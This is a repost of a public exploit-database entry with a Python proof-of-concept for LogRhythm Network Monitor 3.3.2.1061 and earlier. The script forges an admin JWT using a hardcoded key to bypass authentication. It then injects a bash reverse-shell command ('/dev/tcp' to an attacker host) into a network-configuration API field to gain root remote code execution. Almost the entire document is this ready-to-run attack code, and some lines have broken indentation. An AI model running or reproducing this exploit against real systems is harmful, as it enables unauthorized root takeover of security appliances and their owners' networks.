LogRhythm Network Monitor – Authentication Bypass / Command Injection

• Exploit Database
• 31 阅读

• 作者： Francesco Oddo
  日期： 2017-04-24
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/41976/

• # Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
  # Public Disclosure Date: 24 Apr 2017
  # Author: Francesco Oddo
  # Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
  # Software Link: https://logrhythm.com/network-monitor-freemium/
  # Version: 3.3.2.1061 (latest) or below 
  # Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
  # Dependencies: `pip install PyJWT`
  
  import json
  import requests
  import argparse
  import time 
  import jwt
  
  def forge_jwt(rhost):
  	print "[+] Forging JWT authentication token"
  	key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'
  
  	iat = time.time()
  	exp = iat + 3600;
  
  	body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
  	body["iat"] = int(iat)
  	body["exp"] = int(exp)
  
  	token = jwt.encode(body, key, algorithm='HS512');
  	return token
  
  def command_inject(rhost, lhost, lport, gwhost, ifname):
  	uri = "https://%s/data/api/configuration/" % rhost
  	json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
  	payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
  json_body["configurations"][0]["value"] = ifname
  	json_body["configurations"][2]["value"] = rhost
  	json_body["configurations"][3]["value"] = payload
  	json_body["configurations"][4]["value"] = gwhost
  	json_body["configurations"][5]["value"] = gwhost
  	jwt = forge_jwt(rhost)
  	auth_header = {'Token': jwt}
  	print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
  	requests.post(url=uri, json=json_body, headers=auth_header, verify=False)
  
  if __name__ == '__main__':
  	parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
  	parser.add_argument('--rhost', help='RHOST IP address')
  	parser.add_argument('--lhost', help='LHOST IP address')
  	parser.add_argument('--lport', help='LPORT')
  	parser.add_argument('--gwhost', help='Gateway IP address')
  parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
  	args = parser.parse_args()
  
  	command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)